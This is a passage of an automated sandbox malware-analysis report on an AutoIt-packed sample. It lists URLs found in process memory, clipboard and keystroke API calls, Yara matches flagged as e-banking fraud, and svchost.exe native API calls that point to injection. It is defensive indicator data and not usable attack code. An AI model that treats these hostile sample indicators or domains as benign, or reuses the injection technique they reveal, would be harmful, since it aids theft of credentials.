                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/dyk/45418.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/efia/37.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/f/1.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/fd/2187.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/foi/
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/h/2.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/hk/915.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/hxmx/
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/i/
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/iogcw/9547.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/isoil/7192.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/ja/1497.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/jdgn/4.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/ngzb/4.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/nqub/
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/o/15548.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/ogaxv/2937.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/pap/5666.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/pr/3962.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/rc/27272.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/rixjd/1.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/s/6834.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/sh/1621.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/taxd/63.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/tmj/
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/twnns/982.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/uww/2.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/vtot/474.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/vzihb/4277.html:;
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/vzszm/44526.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/w/294.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/wu/
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/wva/4.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/xtyh/7.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/ybseu/7128.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/yge/46643.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/yy/16.html:;
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/zcqef/293.html
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/zpkq/2.html:;
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mirenzhibo.net/zvztm/9313.html
                Source: ReAgentc.exe, 00000004.00000002.4585013929.00000000076CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://beian.miit.gov.cn/
                Source: ReAgentc.exe, 00000004.00000002.4585013929.00000000076CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: ReAgentc.exe, 00000004.00000002.4585013929.00000000076CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: ReAgentc.exe, 00000004.00000002.4585013929.00000000076CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: ReAgentc.exe, 00000004.00000002.4585013929.00000000076CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: ReAgentc.exe, 00000004.00000002.4585013929.00000000076CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: ReAgentc.exe, 00000004.00000002.4585013929.00000000076CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000004D54000.00000004.10000000.00040000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000035D4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2596639604.0000000035E44000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://joker.com/?pk_campaign=Parking&pk_kwd=text
                Source: ReAgentc.exe, 00000004.00000002.4581949171.00000000025D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.liWZ
                Source: ReAgentc.exe, 00000004.00000002.4581949171.00000000025D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: ReAgentc.exe, 00000004.00000002.4581949171.00000000025D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: ReAgentc.exe, 00000004.00000002.4581949171.00000000025D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
                Source: ReAgentc.exe, 00000004.00000002.4581949171.00000000025D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: ReAgentc.exe, 00000004.00000002.4581949171.00000000025D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: ReAgentc.exe, 00000004.00000002.4581949171.00000000025D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: ReAgentc.exe, 00000004.00000003.2481366097.00000000076AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: ReAgentc.exe, 00000004.00000002.4585013929.00000000076CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005E9A000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.000000000471A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: ReAgentc.exe, 00000004.00000002.4583138791.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4584866748.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000043F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F84164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00F84164
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F84164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00F84164
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F83F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00F83F66
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F7001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00F7001C
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F9CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00F9CABC

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.4e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.4e0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2303693143.0000000002990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4582561177.00000000040D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4584397625.0000000005620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4582603239.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4582671918.0000000003830000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4581793209.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2303461712.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2304351781.0000000004750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: This is a third-party compiled AutoIt script.0_2_00F13B3A
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe, 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_19b63039-8
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe, 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_cd882c79-f
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_24c51d7d-f
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_8ee4d1aa-0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0050CAA3 NtClose,2_2_0050CAA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004E1B3C NtProtectVirtualMemory,2_2_004E1B3C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B60 NtClose,LdrInitializeThunk,2_2_03072B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03072DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03072C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030735C0 NtCreateMutant,LdrInitializeThunk,2_2_030735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074340 NtSetContextThread,2_2_03074340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074650 NtSuspendThread,2_2_03074650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B80 NtQueryInformationFile,2_2_03072B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BA0 NtEnumerateValueKey,2_2_03072BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BE0 NtQueryValueKey,2_2_03072BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BF0 NtAllocateVirtualMemory,2_2_03072BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AB0 NtWaitForSingleObject,2_2_03072AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AD0 NtReadFile,2_2_03072AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AF0 NtWriteFile,2_2_03072AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F30 NtCreateSection,2_2_03072F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F60 NtCreateProcessEx,2_2_03072F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F90 NtProtectVirtualMemory,2_2_03072F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FA0 NtQuerySection,2_2_03072FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FB0 NtResumeThread,2_2_03072FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FE0 NtCreateFile,2_2_03072FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E30 NtWriteVirtualMemory,2_2_03072E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E80 NtReadVirtualMemory,2_2_03072E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EA0 NtAdjustPrivilegesToken,2_2_03072EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EE0 NtQueueApcThread,2_2_03072EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D00 NtSetInformationFile,2_2_03072D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D10 NtMapViewOfSection,2_2_03072D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D30 NtUnmapViewOfSection,2_2_03072D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DB0 NtEnumerateKey,2_2_03072DB0
